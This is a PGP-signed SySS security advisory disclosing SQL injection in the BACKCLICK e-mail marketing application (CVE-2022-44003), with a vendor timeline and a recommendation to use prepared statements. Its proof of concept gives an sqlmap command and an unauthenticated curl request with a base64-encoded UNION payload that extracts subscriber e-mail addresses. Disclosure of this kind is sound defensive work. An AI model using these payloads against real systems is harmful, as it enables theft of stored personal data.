-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-029 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89) Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44003 Author of Advisory: Jannik Vieten, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see [1]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When SQL queries are constructed, user-controlled parameters are inserted in an insecure manner. Attackers can exploit this by injecting SQL syntax into parameters to influence the query executed by the database. This can be utilized to retrieve all data stored within the database. The vulnerability exists at various locations within the application. This indicates a structural or architectural problem of BACKCLICK's construction of SQL queries. Confer the "Proof of Concept" section below for exemplary incarnations of the issue. In order to prevent such vulnerabilities, user-controlled parameters must be considered potentially malicious. When constructing database queries, parameters need to be inserted securely in order to render injected SQL syntax harmless. The use of prepared statements with parameterized queries is a method that can be used to accomplish this (see [4]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following examples show locations where SQL injection was possible. This list is not intended to be exhaustive. The search function within the management interface at "Abonnenten - Verwaltung" > "Test-Verteiler" can be exploited using the tool sqlmap (see [5]): sqlmap.py --cookie JSESSIONID=[...session id...] -u 'https://example.com/bc/servlet/gui.bc_rob_positiv?idx=1&action=1&min=0&PATTERN=*&HPS=50' --dbms mysql --level 5 --risk 3 A similar vulnerability is also exploitable by unauthenticated remote attackers. Here, the payload for a UNION-based injection is within a base64-encoded URL parameter: curl -k -i 'https://example.com/bc/servlet/web.announcements?dHlwZT0wJm1pZD0wJmxheW91dD0xJmlkPWEnIEFORCAxPTAgVU5JT04gU0VMRUNUIChTRUxFQ1Qgc3Vic2NyaWJlcl9lbWFpbCBGUk9NIHN1YnNjcmliZXJzIExJTUlUIDEpLCAxIC0tICZwcmV2aWV3PTE;1;1;' This corresponds with the following UNION-based injection: type=0&mid=0&layout=1&id=a' AND 1=0 UNION SELECT (SELECT subscriber_email FROM subscribers LIMIT 1), 1 -- &preview=1 The server's response contains the extracted data (here: an e-mail address) in the "Location" header of the HTTP response: HTTP/1.1 500 500 Date: Wed, 11 May 2022 13:46:11 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: JSESSIONID=...; Path=/bc; Secure; HttpOnly Location: jane.doe@example.org&bc1=1&bc2=1 Content-Length: 1181 Connection: close Content-Type: text/html;charset=UTF-8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for BACKCLICK https://www.backclick.de/ [2] SySS Security Advisory SYSS-2022-029 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-029.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] OWASP SQL Injection Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html [5] Automatic SQL injection and database takeover tool https://github.com/sqlmapproject/sqlmap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jannik Vieten of SySS GmbH. E-Mail: jannik.vieten@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Jannik_Vieten.asc Key ID: 0xC3366ECBE2C70C423ECFC123858221C952002FFB Key Fingerprint: C336 6ECB E2C7 0C42 3ECF C123 8582 21C9 5200 2FFB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwzZuy+LHDEI+z8EjhYIhyVIAL/sFAmNk1xQACgkQhYIhyVIA L/saYQ/+LM3NsGrRo+ohC5YmL4oRY+oLXas6gXpRV6ltKPhQK64ErCtXAFQric/C q/7t7fP1tzm1LJzRV3Xf9F1OvLiRlE6ItQZeU75uTdBF/JwUl/Hqm5baCZTcbuH8 oQFw2pAVxSbphrlW9OdeiTsr5P4jVcb3MUQWhBiUq7aofr/vrHIBuBU4iP1ehz6A +6aDAdTqNmDmRTBVOoLQYuMccel4EGvUgTeFvcNCjSWhhhuEB9MCmNEHXDrUl9yi gDHzHKtIurpt2FWabc2flblL8IRLAP7z6QG4/kMPTbfuK0YUOISfO++4+UHMOUQ2 92/AMbZESMe0O26rHbnXNdygVR/FMQRFINurMcuLbb0gJtEqJXnpFJGCZ9ByeFRJ syNrjpdgaV1JwqQuJR9MBM4Fgo8rseFSQQVIGVaVMZOXkzDrFBJZMgxxpqGWx8jL HMcnmhVTEdsz6qjAHNT+hJZ8WWwJksO4RPgtpPB6lF1suaWHn7ZWzN4dUKe7DErt 6fEXFSkf1t3H8vVJLSSihyJwxO+hyVOHVBKN6NZaO/NMTLMZ+mzJjGFsC7wujrEP SziBzPxvelWKfJVKLUsbWHVr66g8T73wUVfJwNkS8ExFqUQ5HWZCOOL0nTgESPL8 vaZxzWhcPnCc9oVq6I8TuurSDQ8w3Vh2UzK3SGx+Wh5CPJy5EaU= =/w+N -----END PGP SIGNATURE-----